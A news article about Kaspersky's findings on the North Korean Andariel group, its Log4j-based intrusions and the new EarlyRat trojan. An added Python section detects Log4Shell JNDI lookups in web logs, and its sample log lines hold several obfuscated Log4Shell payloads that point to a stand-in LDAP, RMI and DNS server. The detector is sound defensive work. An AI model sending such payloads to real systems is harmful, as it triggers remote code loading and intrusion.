Andariel’s Mistakes Uncover New Malware in Lazarus Group Campaign

Researchers have discovered a previously undocumented malware family and exposed operational errors made by Andariel, a subgroup of the North Korean threat actor known as Lazarus Group.

Kaspersky described the findings in an advisory published today, which analyzed the group’s tactics and revealed the emergence of a new threat called “EarlyRat.”

“In the vast landscape of cybercrime, we encounter numerous players and groups that operate with fluid compositions,” commented Jornt van der Wiel, a senior security researcher at Kaspersky’s Global Research & Analysis Team (GReAT).

“It is common for groups to adopt code from others and even affiliates who can be considered as independent entities, switching between different types of malware.”

The Andariel group is known for using the DTrack malware and the Maui ransomware; that activity drew attention in mid-2022.

Exploiting the Log4j vulnerability (Log4Shell, CVE-2021-44228), Andariel introduced various malware families, including YamaBot and MagicRat, along with updated versions of NukeSped and DTrack.

During an unrelated investigation, Kaspersky researchers discovered Andariel’s campaign and decided to dig deeper.

The investigation revealed that Andariel initiates infections by executing a Log4j exploit, which downloads additional malware from a command-and-control (C2) server. 
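Because the intrusion chain starts with a Log4j exploit, the earliest detection opportunity is the JNDI lookup string that reaches the vulnerable logger, typically through a request header or URL parameter. The following added example (not code from Kaspersky's report or from the Andariel tooling) scans constructed web-server log lines for such lookups. It first collapses the nesting tricks attackers use to evade naive `${jndi:` matching (`${lower:j}`, `${upper:J}` and `${::-j}`-style default-value lookups, plus URL encoding), then reports the scheme and target host of each decoded lookup. The log lines, IP addresses and hostnames are invented for the demonstration.

```python
import re
from dataclasses import dataclass
from urllib.parse import unquote

# Innermost Log4j 2 lookup: "${...}" whose body contains no further "$", "{" or "}".
INNERMOST_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# A decoded JNDI lookup: "${jndi:<scheme>://<host[:port]>..."
JNDI_PATTERN = re.compile(
    r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)://([^/}\s]+)", re.IGNORECASE
)

# Constructed sample log lines (not real telemetry). Lines 2-4 and 6 carry
# progressively more obfuscated Log4Shell payloads; lines 1 and 5 are benign.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - "GET /?x=${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7/x} HTTP/1.1" 404 "curl/7.8"',
    '10.0.0.3 - - "GET /search?q=${date:yyyy} HTTP/1.1" 200 "-"',
    '10.0.0.9 - - "GET /?q=%24%7Bjndi%3Adns%3A%2F%2F198.51.100.7%2Fleak%7D HTTP/1.1" 200 "-"',
]


@dataclass
class JndiFinding:
    line_no: int      # 1-based index into the scanned log
    scheme: str       # ldap, rmi, dns, ...
    target: str       # host[:port] the victim JVM would contact
    normalized: str   # the log line after de-obfuscation


def _collapse(match: re.Match) -> str:
    """Resolve one innermost lookup the way Log4j 2 would, for the evasion cases.

    ${lower:X} -> x, ${upper:X} -> X, ${anything:-X} -> X (default value).
    Other lookups (including the jndi lookup itself) are left untouched so the
    caller can match on them.
    """
    content = match.group(1)
    key, _, rest = content.partition(":")
    key = key.strip().lower()
    if key == "lower":
        return rest.lower()
    if key == "upper":
        return rest.upper()
    if key != "jndi" and ":-" in content:
        # "${::-j}" or "${env:UNSET:-j}" both evaluate to the default "j".
        return content.split(":-", 1)[1]
    return match.group(0)


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Repeatedly collapse innermost lookups until nothing changes.

    Each round removes at least one "${", so the loop is bounded even
    without max_rounds; the cap is a safety net against pathological input.
    """
    for _ in range(max_rounds):
        new_text = INNERMOST_LOOKUP.sub(_collapse, text)
        if new_text == text:
            break
        text = new_text
    return text


def scan_log_lines(lines) -> list:
    """Return a JndiFinding for every decoded JNDI lookup in the given lines."""
    findings = []
    for line_no, raw in enumerate(lines, start=1):
        normalized = normalize_lookups(unquote(raw))
        for m in JNDI_PATTERN.finditer(normalized):
            findings.append(
                JndiFinding(line_no, m.group(1).lower(), m.group(2), normalized)
            )
    return findings


if __name__ == "__main__":
    for f in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {f.line_no}: jndi {f.scheme} -> {f.target}")
```

The de-obfuscation step matters more than the final regex: a rule that only looks for the literal `${jndi:` misses lines 3, 4 and 6 entirely, while the normalized form makes all four malicious lines match the same simple pattern. Matching is done on the decoded line, so the `normalized` field should be kept alongside the raw log entry for the analyst.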

Notably, researchers observed the execution of commands by a human operator and noted numerous mistakes and typos, suggesting an inexperienced individual was behind the operation.

The researchers also identified the new malware family known as EarlyRat. Although initially believed to be downloaded via Log4j, further analysis revealed that phishing documents were the primary delivery mechanism for EarlyRat. 

The malware, categorized as a remote access Trojan (RAT), gathers system information and communicates with the C2 server using a specific template.

“Subgroups of APT groups, such as Lazarus’ Andariel, engage in typical cybercrime activities like deploying ransomware,” van der Wiel explained.

“Focusing on tactics, techniques, and procedures (TTPs), as we did with Andariel, we can significantly reduce attribution time and detect attacks at their early stages.”

The Kaspersky advisory comes weeks after blockchain analysis company Elliptic linked Lazarus Group to the Atomic Wallet heist.
